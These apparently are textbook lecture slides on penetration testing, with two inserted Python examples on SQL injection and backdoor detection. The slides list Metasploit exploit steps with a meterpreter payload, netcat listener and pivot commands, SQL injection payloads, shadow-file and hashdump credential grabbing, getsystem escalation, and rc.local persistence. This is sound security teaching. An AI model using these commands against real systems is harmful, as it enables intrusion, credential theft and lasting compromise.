Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.

Presentation transcript:

Chapter 8: Penetration Testing

Key Forms of Penetration Attacks
- Buffer overflows
- Command injection
- SQL injection

Network Penetration and Metasploit (Console Session)
  # cd /pentest/exploits/framework3
  # ./msfconsole
  msf > search MS
  msf > use exploit/windows/smb/ms06_040_netapi
  msf exploit(ms06_040_netapi) > info
  msf exploit(ms06_040_netapi) > show payloads
  msf exploit(ms06_040_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  msf exploit(ms06_040_netapi) > show options
  msf exploit(ms06_040_netapi) > set RHOST
  msf exploit(ms06_040_netapi) > show targets
  msf exploit(ms06_040_netapi) > set TARGET 5
  msf exploit(ms06_040_netapi) > show options
  msf exploit(ms06_040_netapi) > save
  msf exploit(ms06_040_netapi) > check
  msf exploit(ms06_040_netapi) > exploit
  msf exploit(ms06_040_netapi) > sessions -l
  msf exploit(ms06_040_netapi) > sessions -i 1
  meterpreter > ?

Netcat, Pivoting, and Raw Shells
- Setting up and connecting a listener:
  - Target # nc -l -p 80
  - Tester # nc
- Setting up a 3 machine pivot:
  - Target (.30) # nc -l -p 80
  - RelaySetup # mknod FIFO p
  - Relay (.10) # nc -l -p 200 FIFO
  - Tester # nc

Attacking Web/Internet Applications and Databases
- SQL injection attacks:
  - false') OR ('true' = 'true : Grouping by parentheses
  - false' OR 'true' = 'true'; -- : -- is an SQL comment, ends statement
  - ' OR 'true' = 'true' --
  - 0 ; select * from Student where 0=0 ; --
  - 0' UNION SELECT * FROM Student where 0=0 --
- Paros Proxy is a Backtrack tool for man-in-the-middle attacks
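Why the tautology strings on this slide work, and what stops them, shown as an added example that is not part of the original lecture materials. The Student table name comes from the slide; its columns, the sample rows and both login functions are assumptions made for the demonstration.

```python
import sqlite3

# Payload copied from the slide: closes the string, adds a tautology,
# and comments out the rest of the statement.
SLIDE_PAYLOAD = "' OR 'true' = 'true' --"


def make_db():
    """Build an in-memory database with constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Student (id INTEGER, name TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO Student VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2")],
    )
    return db


def login_concat(db, name, password):
    """Vulnerable form: user input is spliced into the SQL text."""
    sql = (
        "SELECT id FROM Student WHERE name = '" + name
        + "' AND password = '" + password + "'"
    )
    return db.execute(sql).fetchall()


def login_param(db, name, password):
    """Hardened form: placeholders keep input as data, never as SQL syntax."""
    sql = "SELECT id FROM Student WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Concatenation: the WHERE clause collapses to "always true".
    print("concatenated :", login_concat(db, SLIDE_PAYLOAD, "x"))
    # Parameterized: the payload is compared as a literal name and matches nothing.
    print("parameterized:", login_param(db, SLIDE_PAYLOAD, "x"))
    print("valid login  :", login_param(db, "alice", "s3cret"))
```
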

User Enumeration and Hash Grabbing
- Gather web addresses on Backtrack
  - # cd /pentest/enumeration/google/theHarvester
  - # ./theHarvester.py -d cnn.com -b pgp
- Hash grabbing with meterpreter
  - meterpreter > use privs
  - meterpreter > hashdump
- Enumeration on Linux
  - # cut -d: -f1 /etc/passwd
- Hash grabbing from root on Linux
  - # grep -v ':x:' /etc/shadow | grep -v ':!:' | cut -d: -f2

Password Cracking
- Password policies on Windows
  - Local Windows password policies: C:\> net accounts
  - Windows domain password policies: C:\> net accounts /domain
- John the Ripper supports password cracking
  - based on brute force, dictionary, fuzzing
- Rainbow table techniques are highly efficient algorithms for cracking complex passwords using tables with exhaustive password/hash lists
- Cain & Abel cracks passwords from all Windows formats, popular network devices, and databases using multiple techniques, such as brute force, dictionary, and rainbow tables

Privilege Escalation
- Privilege escalation means gaining administrative privileges, e.g. root
- Some Metasploit exploits automatically escalate, e.g.
  - modules/exploit/unix/smtp/exim4_string_format, used with the shell_reverse_tcp payload
- Meterpreter can also escalate, for example:
  - meterpreter > use privs : Load the Privs module
  - meterpreter > getsystem -h : Help text
  - meterpreter > getsystem : Privilege escalation
  - meterpreter > hashdump : Grab password hashes

Final Malicious Attack Phases
- Forward and Reverse Backdoors
  - Easy to set up using netcat listeners
- Entrenchment
  - To survive reboot, add backdoor to /etc/rc.local, /etc/rc.d/rc.local (both Linux) or the Startup Folder (Windows)
- Hidden Files
  - Easily accomplished on Windows (checkbox) or Linux (. or .. filename)
- Rootkits
  - Rootkits are an ultimate form of malicious entrenchment.
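A defender's check for the entrenchment and hidden-file techniques listed on this slide, as an added example that is not part of the original lecture materials. The rc.local text and directory listing are constructed samples, and the tool-name list and function names are assumptions.

```python
import os
import shlex

LISTENER_TOOLS = {"nc", "ncat", "netcat"}  # assumption: binaries worth flagging

# Constructed sample of an /etc/rc.local file containing a netcat listener.
SAMPLE_RC_LOCAL = """\
#!/bin/sh -e
# rc.local: executed at the end of each multiuser runlevel
/usr/sbin/ntpdate pool.example.org
nc -l -p 80 &
exit 0
"""

# Constructed directory listing with dot-prefixed (hidden) names.
SAMPLE_LISTING = [".", "..", "index.html", "...", ".. ", ".cache"]


def find_listeners(rc_text):
    """Return (line_number, line) for startup lines that launch a netcat listener."""
    hits = []
    for number, raw in enumerate(rc_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks, comments and the shebang
        try:
            tokens = shlex.split(line, comments=True)
        except ValueError:
            tokens = line.split()  # unbalanced quotes: fall back to a plain split
        for i, token in enumerate(tokens):
            if os.path.basename(token) in LISTENER_TOOLS:
                args = tokens[i + 1:]
                short = [a for a in args if a.startswith("-") and not a.startswith("--")]
                if any("l" in flag for flag in short) or "--listen" in args:
                    hits.append((number, line))
                break
    return hits


def hidden_entries(names):
    """Return dot-prefixed names, excluding the '.' and '..' directory links."""
    return sorted(n for n in names if n.startswith(".") and n not in (".", ".."))


if __name__ == "__main__":
    print(find_listeners(SAMPLE_RC_LOCAL))
    print(hidden_entries(SAMPLE_LISTING))
```

On a live host, the same functions can be fed the contents of /etc/rc.local or /etc/rc.d/rc.local and the output of os.listdir() for the directories under review.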

REVIEW CHAPTER SUMMARY